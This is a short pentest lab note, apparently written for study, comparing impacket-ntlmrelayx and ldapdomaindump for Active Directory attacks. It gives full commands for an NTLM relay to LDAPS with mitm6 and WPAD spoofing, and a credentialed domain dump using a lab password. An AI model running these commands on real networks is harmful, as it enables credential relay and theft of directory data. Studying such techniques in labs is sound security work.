ntlmrelayx vs. ldapdomaindump: Differences

Usage:
- ntlmrelayx can relay NTLM authentication to LDAP(S) to gain privileges and dump domain information.
- It can capture domain files during a mitm6 attack or an NTLM relay attack.
Example Command:
```
impacket-ntlmrelayx -6 -t ldaps://192.168.150.128 -wh fakewpad.marvel.local -l lootme
```
- -6 → Uses IPv6 for mitm6 attacks.
- -t ldaps://... → Targets LDAP over SSL.
- -wh fakewpad... → Spoofs WPAD.
- -l lootme → Saves captured files in the "lootme" directory.

Usage:
- ldapdomaindump is used for manual domain enumeration using a valid LDAP(S) login.
- Instead of relaying, you provide valid AD credentials and pull domain info.
Example Command:
```
python3 -m ldapdomaindump ldaps://192.168.150.128 -u 'MARVEL\\fcastle' -p Password1
```
- This dumps all AD information (users, groups, policies, ACLs, etc.).
- The output will include JSON, CSV, and HTML reports.

Scenario	Use `ntlmrelayx`	Use `ldapdomaindump`
You have relayed NTLM auth via mitm6	✅ Yes	❌ No
You have valid AD credentials	❌ No	✅ Yes
You want to automatically capture AD info	✅ Yes	❌ No
You want detailed AD enumeration	❌ No	✅ Yes

Run ntlmrelayx to capture authentication and dump AD info

impacket-ntlmrelayx -6 -t ldaps://192.168.150.128 -wh fakewpad.marvel.local -l lootme

If you have valid AD creds, use ldapdomaindump for further enumeration

python3 -m ldapdomaindump ldaps://192.168.150.128 -u 'MARVEL\\fcastle' -p Password1